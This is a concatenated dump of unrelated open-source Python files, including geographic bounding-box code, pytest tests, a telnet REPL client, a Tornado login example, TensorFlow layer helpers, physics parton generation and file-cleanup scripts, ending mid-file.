//stackoverflow.com/questions/1648917/given-a-latitude-and-longitude-and-distance-i-want-to-find-a-bounding-box\n\nimport math\n\n\nclass BoundingBox(object):\n def __init__(self, *args, **kwargs):\n self.lat_min = None\n self.lon_min = None\n self.lat_max = None\n self.lon_max = None\n\n\ndef get_bounding_box(latitude_in_degrees, longitude_in_degrees, half_side_in_km):\n assert half_side_in_km > 0\n assert -90.0 <= latitude_in_degrees <= 90.0\n assert -180.0 <= longitude_in_degrees <= 180.0\n\n lat = math.radians(latitude_in_degrees)\n lon = math.radians(longitude_in_degrees)\n\n radius = 6371\n parallel_radius = radius * math.cos(lat)\n\n lat_min = lat - half_side_in_km / radius\n lat_max = lat + half_side_in_km / radius\n lon_min = lon - half_side_in_km / parallel_radius\n lon_max = lon + half_side_in_km / parallel_radius\n rad2deg = math.degrees\n\n box = BoundingBox()\n box.lat_min = rad2deg(lat_min)\n box.lon_min = rad2deg(lon_min)\n box.lat_max = rad2deg(lat_max)\n box.lon_max = rad2deg(lon_max)\n\n return box\n","sub_path":"airbnb/bounding_box.py","file_name":"bounding_box.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"105283881","text":"import pytest\nimport datetime\nfrom application.model import GoalModel, GroupModel\nfrom application.exc import AppBaseException\n\n\ndef test_goal_create_by_group(group_factory):\n group = group_factory()\n group_id = group.id\n assert group_id\n goal = group.create_goal(\n criteria='criteria',\n started_date='2018-06-01',\n ended_date='2018-06-30',\n )\n\n assert goal\n assert goal.group_id == group_id\n\n\ndef test_group_has_only_one_goal(group_factory):\n group = group_factory()\n group_id = group.id\n assert group_id\n goal = group.create_goal(\n criteria='criteria',\n started_date='2018-06-01',\n ended_date='2018-06-30',\n )\n assert goal.id\n\n with pytest.raises(AppBaseException) as excinfo:\n group.create_goal(\n criteria='criteria',\n started_date='2018-06-01',\n ended_date='2018-06-30',\n )\n assert isinstance(excinfo.value, AppBaseException)\n\n\ndef test_goal_update(fixture_goal):\n goal = fixture_goal\n title = 'updated title'\n description = 'updated description'\n goal.title = title\n goal.description = description\n assert goal\n assert goal.title == title\n assert goal.description == description\n\n\ndef test_fixture_goal_backref_one_to_on(fixture_goal):\n assert fixture_goal.group\n assert fixture_goal.group_id == fixture_goal.group.id\n\n\ndef test_create_achievements_멤버의_성과카드를_생성한다(\n user_factory,\n group_with_goal_many_users: GroupModel,\n\n):\n # given\n group = group_with_goal_many_users\n goal: GoalModel = group.goal\n assert goal\n\n # when\n user = user_factory()\n achievements = goal.create_achievements(user.id)\n\n # then\n required_days_count = ((goal.ended_date - goal.started_date) + datetime.timedelta(days=1)).days\n assert required_days_count == len(achievements)\n","sub_path":"tests/application/model/test_goal.py","file_name":"test_goal.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"569483625","text":"#!/usr/bin/python\n\nimport os\nimport errno\nimport sys\nimport socket\n\nHOST = '127.0.0.1'\nPORT = 2222\n\nNEWLINE = '\\r\\n'\n\nTELNET_IS = b'\\x00'\n\nTELNET_SE = b'\\xf0'\nTELNET_GOA = b'\\xf9'\nTELNET_SB = b'\\xfa'\nTELNET_WILL = b'\\xfb'\nTELNET_WONT = b'\\xfc'\nTELNET_DO = b'\\xfd'\nTELNET_DONT = b'\\xfe'\nTELNET_IAC = b'\\xff'\n\nTELOPT_TERMINAL_TYPE = b'\\x18'\nTELOPT_EXTEND = b'\\xfe'\n\nTELMSG_GOAHEAD = TELNET_IAC + TELNET_GOA\nTELMSG_TERM_BEGIN = TELNET_IAC + TELNET_SB + TELOPT_TERMINAL_TYPE + TELNET_IS\nTELMSG_TERM_END = TELNET_IAC + TELNET_SE\nTELMSG_EXTEND_BEGIN = TELNET_IAC + TELNET_SB + TELOPT_EXTEND + TELNET_IS\nTELMSG_EXTEND_END = TELNET_IAC + TELNET_SE\n\nTELNET_CMDLIST_NOARG = b'\\xf1\\xf2x\\f3x\\f4x\\xf5\\xf6\\xf7\\xf8\\xf9'\nTELNET_CMDLIST_ARG = b'\\xfb\\xfc\\xfd\\xfe'\n\nclass Connection(object):\n\n def __init__(self, host, port):\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.socket.connect((host, port))\n self.__buffer = ''\n\n def __recv(self):\n data = self.socket.recv(2048)\n if len(data) == 0:\n raise socket.error(errno.ECONNRESET, os.strerror(errno.ECONNRESET))\n self.__buffer += data\n return data\n\n def __pop_buffer(self):\n result = self.__buffer\n self.__buffer = ''\n return result\n\n def __pop_telnet_command(self, end=None):\n n = len(self.__buffer)\n i = self.__buffer.find(TELNET_IAC, 0, end)\n if i < 0:\n return None\n if n < i + 2:\n return None\n c = self.__buffer[i+1]\n if c in TELNET_CMDLIST_NOARG:\n result = self.__buffer[i:i+2]\n self.__buffer = self.__buffer[:i] + self.__buffer[i+2:]\n return result\n elif c in TELNET_CMDLIST_ARG:\n if n > i + 2:\n result = self.__buffer[i:i+3]\n self.__buffer = self.__buffer[:i] + self.__buffer[i+3:]\n return result\n elif c in TELNET_SB:\n j = self.__buffer.find(TELNET_IAC + TELNET_SE, i)\n if j > 0:\n result = self.__buffer[i:j+2]\n self.__buffer = self.__buffer[:i] + self.__buffer[j+2:]\n return result\n else:\n raise ValueError\n return None \n\n def __read(self):\n while True:\n while True:\n result = self.__pop_telnet_command()\n if result is None:\n break\n elif result == TELMSG_GOAHEAD: # GO AHEAD\n return self.__pop_buffer()\n elif result.startswith(TELMSG_EXTEND_BEGIN):\n self.__extendmsg = result[4:-2]\n return ''\n self.__recv()\n\n def __write(self, data):\n if len(data) == 0:\n return\n self.socket.sendall(data)\n\n def __fake_telnet_negotiation(self):\n self.__write(TELNET_IAC + TELNET_WILL + TELOPT_TERMINAL_TYPE)\n self.__write(TELNET_IAC + TELNET_WILL + TELOPT_EXTEND)\n self.__write(TELMSG_TERM_BEGIN + 'REPLCLIENT' + TELMSG_TERM_END)\n\n def startup(self):\n self.__fake_telnet_negotiation()\n return self.__read()\n\n def shutdown(self, how):\n return self.socket.shutdown(how)\n\n def send_extendmsg(self, cmd):\n self.__write(TELMSG_EXTEND_BEGIN + cmd + TELMSG_EXTEND_END)\n result = self.__read()\n if result != '':\n raise ValueError\n extendmsg = self.__extendmsg.split('\\n')\n self.__extendmsg = None\n return extendmsg\n\n def send_command(self, cmd):\n self.__write(cmd + NEWLINE)\n return self.__read()\n\n\nclass Completer(object):\n\n def __init__(self, connection):\n self.connection = connection \n self.clear_cache()\n\n def clear_cache(self):\n self.__cache = {}\n\n def cache_val(self, v, f):\n if v not in self.__cache:\n self.__cache[v] = f()\n return self.__cache[v]\n\n def get_locals(self):\n return self.connection.send_extendmsg(\"'\\\\n'.join(locals().keys())\")\n\n def get_dir(self, code):\n return self.connection.send_extendmsg(\"'\\\\n'.join(dir(%s))\" % code)\n\n def get_path_dir(self, locs, path):\n attrs = locs\n for i, token in enumerate(path):\n if token in attrs:\n attrs = self.get_dir('.'.join(path[0:i+1]))\n else:\n return []\n return attrs\n\n def completer(self, text, state):\n if text == '':\n return None\n try:\n locs = self.cache_val('locals', self.get_locals)\n if '.' in text:\n tokens = text.split('.')\n start = tokens[0:-1]\n last = tokens[-1]\n\n name = 'dir_' + '.'.join(start)\n attrs = self.cache_val(name, lambda: self.get_path_dir(locs, start))\n \n suggestion = [ w for w in attrs if w.startswith(last) ][state]\n return '.'.join(start + [suggestion])\n else:\n return [ w for w in locs if w.startswith(text) ][state]\n except IndexError:\n return None\n\n\ndef main():\n connection = Connection(HOST, PORT)\n completer = Completer(connection)\n \n try:\n import readline\n readline.set_completer(completer.completer)\n readline.parse_and_bind('tab: complete')\n except ImportError:\n pass\n\n try:\n sys.stdout.write(connection.startup())\n while True:\n completer.clear_cache()\n cmd = raw_input('> ')\n cmd = cmd.strip()\n sys.stdout.write(connection.send_command(cmd))\n except EOFError:\n sys.stdout.write(NEWLINE + 'connection closing...' + NEWLINE)\n connection.shutdown(socket.SHUT_RDWR)\n except socket.error as err:\n sys.stdout.write(err.args[1] + NEWLINE)\n return\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":5972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"116198294","text":"import Tornados.web\r\nimport Tornados.ioloop\r\nimport uuid\r\n\r\ndict_sessions = {}\r\n\r\n\r\nclass BaseHandler(Tornados.web.RequestHandler):\r\n def get_current_user(self):\r\n if self.get_secure_cookie(\"session_id\") is None:\r\n return None\r\n session_id = self.get_secure_cookie(\"session_id\").decode(\"utf-8\")\r\n return dict_sessions.get(session_id)\r\n\r\n\r\nclass MainHandler(BaseHandler):\r\n @Tornados.web.authenticated\r\n def get(self):\r\n name = Tornados.escape.xhtml_escape(self.current_user)\r\n self.write(\"Hello, \" + name)\r\n\r\n\r\nclass LoginHandler(BaseHandler):\r\n def get(self):\r\n self.write('
'\r\n 'Name: '\r\n ''\r\n '
')\r\n\r\n def post(self):\r\n if len(self.get_argument(\"name\")) < 3:\r\n self.redirect(\"/login\")\r\n return\r\n session_id = str(uuid.uuid1())\r\n dict_sessions[session_id] = self.get_argument(\"name\")\r\n self.set_secure_cookie(\"session_id\", session_id)\r\n self.redirect(\"/\")\r\n\r\n\r\napplication = Tornados.web.Application(\r\n [\r\n (r\"/\", MainHandler),\r\n (r\"/login\", LoginHandler),\r\n ],\r\n cookie_secret=\"SECRET_DONT_LEAK\",\r\n login_url=\"/login\")\r\n\r\n\r\ndef main():\r\n application.listen(8888)\r\n Tornados.ioloop.IOLoop.current().start()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"code/chapter07/7-6.py","file_name":"7-6.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"99987276","text":"'''\n@Descripttion: \n@version: \n@Author: Liang Anqing\n@Date: 2020-08-06 19:23:58\n@LastEditors: Liang Anqing\n@LastEditTime: 2020-08-06 19:36:40\n'''\ndef solution(n):\n rs=0\n flag=1\n for i in range(1,2*n+1):\n rs+=(1/i)*flag\n flag*=-1\n rs*=0.2000\n return round(rs,4)\nif __name__=='__main__':\n n=int(input())\n res=solution(n)\n print(res)","sub_path":"京东数列求和.py","file_name":"京东数列求和.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"191802675","text":"import tensorflow as tf\n\n\ndef weights(shape, initializer='variance_scaling', reg_norm=True, reg_coef=0.001, name='variable'):\n if initializer == 'variance_scaling':\n init = tf.variance_scaling_initializer()\n else:\n init = tf.glorot_normal_initializer()\n weight = tf.Variable(init(shape), name=name)\n\n if reg_norm:\n l2_norm = reg_coef * tf.reduce_sum(tf.squared(weight))\n return weight, l2_norm\n\n return weight\n\ndef dense(out_dim, input, mean=0, var=1., activation=tf.nn.relu):\n in_dim = input.get_shape()[-1].value\n W = tf.Variable(tf.random_normal([in_dim, out_dim], mean, var))\n b = tf.Variable(tf.zeros([out_dim]))\n\n output = tf.matmul(input, W) + b\n if activation:\n output = activation(output)\n\n return output\n\ndef batch_norm(x, if_train, type='conv', epsilon=1e-3, decay=0.9):\n '''\n Batch normalization layer\n Args:\n - type: either `conv` or `fc`; determines which axes\n to aggregate moments over.\n '''\n if type == 'conv':\n axes = [0, 1, 2]\n else:\n axes = [0]\n\n '''\n During training, we use the mean and variance per batch\n to standardize; however, during evaluation, we want to use\n an exponential moving average of the batch means we've\n seen thus far.\n '''\n mean, var = tf.nn.moments(x, axes, keep_dims=True)\n ema = tf.train.ExponentialMovingAverage(decay=decay)\n ema_op = ema.apply([mean, var])\n\n with tf.control_dependencies([ema_op]):\n ema_mean, ema_var = tf.identity(mean), tf.identity(var)\n\n batch_mean, batch_var = tf.cond(\n if_train,\n lambda : (ema_mean, ema_var),\n lambda : (ema.average(mean), ema.average(var)))\n \n out_shape = tf.shape(mean)\n gamma = tf.Variable(\n tf.constant(1., shape=out_shape),\n name='gamma',\n trainable=True)\n beta = tf.Variable(\n tf.constant(0., shape=out_shape),\n name='beta',\n trainable=True)\n\n # Apply the tensorflow batch normalization operation\n y = tf.nn.batch_normalization(x, batch_mean,\n batch_var, beta, gamma, epsilon)\n\n return y\n","sub_path":"ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"424839455","text":"import random\r\nimport urllib\r\nfrom urllib import request,parse\r\n#urlopen简单发送网络请求\r\nua_list = [\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\",\r\n \"Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11\",\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6\",\r\n \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6\"\r\n]\r\nurl = \"https://www.baidu.com\"\r\nheader = random.choice(ua_list)\r\n# print(header)\r\nrequest = urllib.request.Request(url)\r\nrequest.add_header(\"User-Agent\",header)\r\n#get——header()字符串参数,第一个字母大写,后面的全部小写\r\nrequest.get_header(\"Header\")\r\n\r\n# response = urllib.request.urlopen(request)\r\n# print(response.code)\r\n# html = response.read()\r\n# print(html)\r\n\r\n\r\n\r\n\r\n#quote() 主要将中文转化为ascll码\r\nurls = \"https://www.baidu.com/s?wd=火影忍者\"\r\nurl = \"https://www.baidu.com/s?wd=\"\r\ndata = parse.quote('火影忍者')\r\nres = url + data\r\nprint(res)\r\n\r\n\r\n# 通过urlencode()方法,将字典键值对按URL编码转换,从而能被web服务器接受\r\nparams = {'name':'冬风诉','pw':'fgmdd537'}\r\ndatas = parse.urlencode(params)\r\nprint(\"这是urlencode方法---\"+datas)\r\n#parse_qsl是转换成元组格式\r\n# print(parse.parse_qsl(datas))\r\n#通过parse_qs把url编码转回中文字典格式\r\nprint(parse.parse_qs(datas))\r\n\r\n#unquote() 主要将ascll码转化为中文\r\nprint(parse.unquote(res))\r\nprint(type(res))\r\n#quote() 将中文转化为ascll码\r\nprint(parse.quote(urls))\r\n\r\nprint(parse.unquote('kw=%E8%8B%B1%E9%9B%84%E8%81%94%E7%9B%9F&ie=utf-8&pn=50'))\r\nprint(parse.quote('kw=英雄联盟&ie=utf-8&pn=50'))\r\n\r\n\r\n# urllib.error\r\n#异常处理请求\r\n#URLError error,所有的request异常处理\r\n#HTTPError URLError子类\r\n# code:请求状态码 reason:错误的原因 headers:相应的报文头(头信息)\r\n\r\n#urllib.robotparse\r\n#Robots(机器人)协议:不是命令,单纯的文件,搜索引擎看的第一个文件\r\n\r\n","sub_path":"demo01.py","file_name":"demo01.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"84106655","text":"import numpy as np\nfrom random import choice\n\ndef lorentz(beta, fourVector):\n \"\"\" Takes as input relative beta from O -> O'\n and calculates fourVector -> fourVector' \"\"\"\n\n beta2 = np.dot(beta, beta)\n gamma = 1./np.sqrt(1. - beta2)\n \n Lambda = np.array([ [gamma, -gamma*beta[0], -gamma*beta[1], -gamma*beta[2]],\n [-gamma * beta[0], 1 + (gamma-1)*beta[0]**2/beta2, (gamma-1)*beta[0]*beta[1]/beta2, (gamma-1)*beta[0]*beta[2]/beta2],\n [-gamma * beta[1], (gamma-1)*beta[1]*beta[0]/beta2, 1 + (gamma-1)*beta[1]**2/beta2, (gamma-1)*beta[1]*beta[2]/beta2],\n [-gamma * beta[2], (gamma-1)*beta[2]*beta[0]/beta2, (gamma-1)*beta[2]*beta[1]/beta2, 1 + (gamma-1)*beta[2]**2/beta2]], dtype=np.float32)\n\n return np.dot(Lambda, fourVector)\n\ndef create_anti(particle):\n return [1 - x for x in particle[:-1]] + [1]\n\ndef create_duplet(meson, mass_parton=0.01):\n \"\"\" Takes position, momentum, and mass from meson\n and creates parton antiparton duplet with same\n energy in LRF and same momentum of CF.\n Standard mass of parton is 0.01 GeV, colour chosen at random \"\"\"\n\n # position for both partons is same as meson's position in cf\n pos = np.array(meson[0:3] + [1], dtype=np.float32)\n\n # LRF Calculation of Energy\n mass_meson = meson[-1]\n\n r = np.sqrt((mass_meson**2 * 0.25 - mass_parton**2))\n phi = np.random.rand()*2*np.pi\n theta = np.random.rand()*2*np.pi\n \n\n p_parton1 = np.array([0,0,0,0], dtype=np.float32)\n p_parton1[0] = mass_meson * 0.5\n p_parton1[1] = r * np.sin(phi) * np.cos(theta)\n p_parton1[2] = r * np.sin(phi) * np.sin(theta)\n p_parton1[3] = r * np.cos(phi)\n\n p_parton2 = np.array([0,0,0,0], dtype=np.float32)\n p_parton2[0] = mass_meson * 0.5\n p_parton2[1] = -r * np.sin(phi) * np.cos(theta)\n p_parton2[2] = -r * np.sin(phi) * np.sin(theta)\n p_parton2[3] = -r * np.cos(phi)\n\n # CF Calculation of Momentum\n\n v_meson = np.array(meson[4:7]) / meson[3]\n p_meson = np.array(meson[3:7])\n\n\n p_parton1 = lorentz(-v_meson, p_parton1)\n p_parton2 = lorentz(-v_meson, p_parton2)\n \n # Chose color at random\n\n c_parton1 = choice([x + [1] for x in [ [0,0,1], [0,1,0], [1,0,0] ] ])\n c_parton2 = create_anti(c_parton1)\n c_parton1 = np.array(c_parton1, dtype=np.float32)\n c_parton2 = np.array(c_parton2, dtype=np.float32)\n\n # return each parton as np.array\n\n parton1 = [pos, p_parton1, c_parton1]\n parton2 = [pos, p_parton2, c_parton2]\n\n return parton1, parton2\n\ndef create_triplet(baryon, mass_parton=0.01):\n \"\"\" Takes position, momentum, and mass from baryon\n and creates parton triplet with same\n energy in LRF and same momentum of CF.\n Standard mass of parton is 0.01 GeV\"\"\"\n\n # position for partons is same as baryon's position in cf\n pos = np.array(baryon[0:3] + [1], dtype=np.float32)\n\n\n # LRF Calculation of Energy\n mass_baryon = baryon[-1]\n\n r = np.sqrt(((mass_baryon/3.)**2 - mass_parton**2))\n phi = np.random.rand()*2*np.pi\n theta = np.random.rand()*2*np.pi\n \n p_parton1 = np.array([0,0,0,0], dtype=np.float32)\n p_parton1[0] = mass_baryon/3.\n p_parton1[1] = r * np.sin(phi) * np.cos(theta)\n p_parton1[2] = r * np.sin(phi) * np.sin(theta)\n p_parton1[3] = r * np.cos(phi)\n\n r = np.sqrt(((mass_baryon/3.)**2 - mass_parton**2))\n phi = np.random.rand()*2*np.pi\n theta = np.random.rand()*2*np.pi\n \n p_parton2 = np.array([0,0,0,0], dtype=np.float32)\n p_parton2[0] = mass_baryon/3.\n p_parton2[1] = r * np.sin(phi) * np.cos(theta)\n p_parton2[2] = r * np.sin(phi) * np.sin(theta)\n p_parton2[3] = r * np.cos(phi)\n\n p_parton3 = -p_parton1 - p_parton2\n p_parton3[0] = mass_baryon/3.\n\n # CF Calculation of Momentum\n\n v_baryon = np.array(baryon[4:7]) / baryon[3]\n p_baryon = np.array(baryon[3:7])\n\n p_parton1 = lorentz(-v_baryon, p_parton1)\n p_parton2 = lorentz(-v_baryon, p_parton2)\n p_parton3 = lorentz(-v_baryon, p_parton3)\n\n # set color r,g,b (momenta at random, though no bias introduced)\n\n c_parton1 = np.array([0,0,1,1], dtype=np.float32)\n c_parton2 = np.array([0,1,0,1], dtype=np.float32)\n c_parton3 = np.array([1,0,0,1], dtype=np.float32)\n\n # return each parton as np.array\n\n parton1 = [pos, p_parton1, c_parton1]\n parton2 = [pos, p_parton2, c_parton2]\n parton3 = [pos, p_parton3, c_parton3]\n\n return parton1, parton2, parton3\n\n \n","sub_path":"create_partons.py","file_name":"create_partons.py","file_ext":"py","file_size_in_byte":4437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"291552057","text":"# -*- coding: utf-8 -*-\n__author__ = 'gelse'\n\nimport common.Choices\nimport platform\nimport os\nimport subprocess\nimport re\n\n__vlc_path__ = os.path.join('C:\\\\\\\\', 'Program Files (x86)', 'VideoLAN', 'VLC', 'vlc.exe')\n__vlc_parameter__ = ['--play-and-exit', '--quiet', '--start-time=20']\n\n__date_pattern__ = re.compile(r'^(\\d\\d) (\\d\\d) (\\d\\d) (.*)$')\n\n\ndef is_chunk_file(filename):\n return filename is not None \\\n and '.chunk0' in filename\n\n\ndef get_remove_file_delegate(directory, filename):\n return lambda: True if os.remove(os.path.join(directory, filename)) else True\n\n\ndef get_play_file_delegate(queue_directory, filename):\n params = [__vlc_path__]\n params.extend(__vlc_parameter__)\n params.append(os.path.join(queue_directory, filename))\n return lambda: True if subprocess.call(params) else True\n\n\ndef all_files_have_same_size(queue_directory, queue_directory_content):\n return len(set([os.path.getsize(os.path.join(queue_directory, x))/10000 for x in queue_directory_content])) == 1\n\n\ndef get_qt_files(queue_directory_content):\n return [x for x in queue_directory_content if os.path.splitext(x)[0].endswith('qt')]\n\n\ndef sizeof_fmt(num):\n for x in ['bytes','KB','MB','GB','TB']:\n if num < 1024.0:\n return \"%3.1f %s\" % (num, x)\n num /= 1024.0\n\n\ndef handle_qt_files(queue_directory, queue_directory_content):\n qt_files = get_qt_files(queue_directory_content)\n if qt_files:\n print('\\n'.join(qt_files))\n if common.Choices.yesno('Delete qt files?', default='y'):\n for x in qt_files:\n os.remove(os.path.join(queue_directory, x))\n return True\n return False\n\n\ndef ask_to_play_file(queue_directory, queue_directory_content):\n return common.Choices.ask([common.Choices.AnswerTuple(\n key=str(ind + 1),\n text='Play {0} ({1} Byte)?'.format(a, sizeof_fmt(os.path.getsize(os.path.join(queue_directory, a)))),\n method=get_play_file_delegate(queue_directory, a))\n for ind, a in enumerate(queue_directory_content\n )],\n default='0',\n text='Choose file to play in {0}'.format(queue_directory))\n\n\ndef ask_for_file_to_delete(queue_directory, queue_directory_content):\n if all_files_have_same_size(queue_directory, queue_directory_content):\n print('-------------- ALL FILES SAME SIZE ----------------')\n return common.Choices.ask([common.Choices.AnswerTuple(\n key=str(ind + 1),\n text='Delete {0} ({1} Byte)?'.format(a, sizeof_fmt(os.path.getsize(os.path.join(queue_directory, a)))),\n method=get_remove_file_delegate(queue_directory, a))\n for ind, a in enumerate(queue_directory_content\n )],\n default='0',\n text='Choose file to delete in {0}'.format(queue_directory))\n\n\ndef parse_nubiles(queue_directory, filename):\n date = ''\n text = ''\n\n directory_subname = queue_directory.split(' - ')[-1]\n category_name = ''.join(os.path.split(queue_directory)[-1].split(' - ')[:-1])\n\n worker_string = filename\n if str(worker_string).startswith(category_name):\n worker_string = worker_string[len(category_name):]\n worker_string = str(worker_string).strip('.')\n worker_string = ''.join(os.path.splitext(worker_string)[:-1])\n worker_string = worker_string.replace('.', ' ')\n cleansed_name = worker_string\n result = __date_pattern__.match(worker_string)\n if result:\n date = '{0}.{1}.{2}'.format(result.group(1), result.group(2), result.group(3))\n text = result.group(4)\n text = re.sub(r'\\s?XXX\\s?', r'', text, flags=re.IGNORECASE)\n text = re.sub(r'\\s?1080p\\s?', r'', text, flags=re.IGNORECASE)\n text = re.sub(r'\\s?MP4-KTR\\s?', r'', text, flags=re.IGNORECASE)\n if str(text).startswith(directory_subname):\n text = text[(len(directory_subname)+1):]\n\n return filename, cleansed_name, date, text\n\n\ndef handle_multiple_directory(queue_directory, queue_directory_content):\n one_file_stays = True\n numeration = 2\n for (original_name, cleansed_name, date, text) in [parse_nubiles(queue_directory, filename) for filename in queue_directory_content]:\n if text:\n new_directory = '{0} - {1}'.format(queue_directory, text)\n else:\n if not common.Choices.yesno('Automove?'):\n return False\n if one_file_stays:\n one_file_stays = False\n print('File {0} stays in original directory.'.format(original_name))\n continue\n new_directory = '{0} {1}'.format(queue_directory, str(numeration))\n numeration += 1\n os.mkdir(new_directory)\n os.rename(os.path.join(queue_directory, original_name), os.path.join(new_directory, original_name))\n print('Created {0} and moved {1} there.'.format(os.path.split(new_directory)[-1], original_name))\n return True\n\ndef clean_up_directory(queue_directory):\n queue_directory_content = os.listdir(queue_directory)\n if len(queue_directory_content) == 1:\n # check if it is a chunk file and delete if it is\n if is_chunk_file(queue_directory_content[0]) and common.Choices.yesno('Delete {0} ?'.format(queue_directory_content[0])):\n os.remove(os.path.join(queue_directory, queue_directory_content[0]))\n os.rmdir(queue_directory)\n else:\n print('Everything ok with {0}, only content: \\n\\t{1}'.format(queue_directory, queue_directory_content[0]))\n elif len(queue_directory_content) == 0:\n os.rmdir(queue_directory)\n print('Deleted empty directory {0}'.format(queue_directory))\n else:\n if handle_qt_files(queue_directory, queue_directory_content):\n clean_up_directory(queue_directory) # recursive call to self until only 1 or 0 file is left\n return\n\n if handle_multiple_directory(queue_directory, queue_directory_content):\n clean_up_directory(queue_directory) # recursive call to self until only 1 or 0 file is left\n return\n\n if ask_to_play_file(queue_directory, queue_directory_content):\n clean_up_directory(queue_directory) # recursive call to self as long as user wants\n return\n\n if ask_for_file_to_delete(queue_directory, queue_directory_content):\n clean_up_directory(queue_directory) # recursive call to self until only 1 or 0 file is left\n return\n\n\nclass Main:\n def __init__(self):\n if platform.system() is 'Linux':\n self.__queueDir = '/fliegenstorage/NAS3/Public/xxx/_queue'\n self.__categoryDir = '/fliegenstorage/NAS3/Public/xxx/_categories'\n if platform.system() is 'Windows':\n self.__queueDir = os.path.join('Z:\\\\\\\\', 'xxx', '_queue')\n self.__categoryDir = os.path.join('D:\\\\\\\\', '_xxx', '_categories')\n self.__videoextensionlist = ['.mp4', '.mp7', '.mov', '.wmv', '.avi', '.mpg']\n\n def run(self):\n queue_content = [os.path.join(self.__queueDir, x) for x in os.listdir(self.__queueDir)]\n for queue_directory in queue_content:\n clean_up_directory(queue_directory)\n\n\n\n\nif __name__ == \"__main__\":\n Main().run()","sub_path":"CleanQueue.py","file_name":"CleanQueue.py","file_ext":"py","file_size_in_byte":7199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"162853557","text":"#!/usr/bin/env python\n\nimport argparse\nimport json\nimport urllib2\n\nfrom stevedore import driver\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'data_url',\n nargs=1,\n default=None,\n help='An url where to get the metadata',\n )\n\n parsed_args = parser.parse_args()\n\n data = json.loads(urllib2.urlopen(parsed_args.data_url).read())\n \n run_order = ['disk_driver', 'image_driver', 'boot_driver', 'post_driver']\n\n for driver_name in run_order:\n managers.append(driver.DriverManager(\n namespace='deployagent.drivers.%s' % (driver_name),\n name=data['drivers'][driver_name],\n invoke_on_load=True,\n invoke_args=(data,),\n ))\n\n for mgr in managers:\n mgr.driver.perform_action(data) \n\n\n","sub_path":"run_deploy_agent.py","file_name":"run_deploy_agent.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"574457304","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n'''\n物品箱\n'''\nimport time\nfrom runcenter.enums import EnumPriority,EnumStatus\nfrom runcenter.testcase import debug_run_all,TestCase\nfrom uilib.backpack_page import Backpack_Page\nfrom uilib.hall_page import Hall_Page\nfrom common.common import Common\n\nclass C31033_DFQP_Backpack_Enterpack(TestCase):\n '''\n 物品箱没有道具,也没有对讲纪录,点击物品箱以及兑奖记录\n '''\n owner = \"MindyZhang\"\n status = EnumStatus.Design\n priority = EnumPriority.High\n timeout = 5\n def pre_test(self):\n self.common = Common()\n # 初始化Luadriver\n self.luadriver = self.common.setupdriver()\n # 每个用例都需要关闭活动,把这个放在初始化里面实现\n self.common.closeactivity_switchserver(self.luadriver, \"预发布\")\n self.hall_page = Hall_Page()\n self.backpack_page = Backpack_Page()\n\n def run_test(self):\n self.start_step(\"等待页面加载完成\")\n self.hall_page.wait_element(\"同步标志\")\n self.start_step(\"进入物品箱页面\")\n time.sleep(2)\n self.hall_page.wait_element(\"物品箱\").click()\n time.sleep(2)\n self.hall_page.screenshot('1.png')\n self.hall_page.wait_element(\"兑奖记录\").click()\n time.sleep(1)\n self.hall_page.screenshot('2.png')\n\n def post_test(self):\n '''\n 测试用例执行完成后,清理测试环境\n '''\n # self.common.deletefile(self.luadriver)\n self.common.closedriver()\n\n# __qtaf_seq_tests__ = [C032_DFQP_Backpack_Enterpack]\nif __name__ == '__main__':\n # C002_DFQP_Login_GuestLogin = C002_DFQP_Login_GuestLogin()\n # C002_DFQP_Login_GuestLogin.debug_run()\n debug_run_all()\n","sub_path":"常规项目/统一大厅常规checklist/1500/DFQP/src/cases/dfqp_backpack.py","file_name":"dfqp_backpack.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"406699866","text":"#!/usr/bin/env python3.5\nimport time\ne = time.time()\n\nimport sys\ndebug = False\nfileWrite = True\nif fileWrite:\n fWPath = \"processed/\" + sys.argv[1] + \"-processed.jpg\"\ndisplayProcessed = False\n\nimport cv2\nimport numpy as np\nimport pickle\n\nif debug:\n print (\"imports: \" + str(format(time.time() - e, '.5f')))\n start = time.time()\nserialFile = \"../pickle.txt\"\n\nH, S, L, R, G, B = \"H\", \"S\", \"L\", \"R\", \"G\", \"B\" # I hate typing quotes\nl, u = \"l\", \"u\" # Lower & 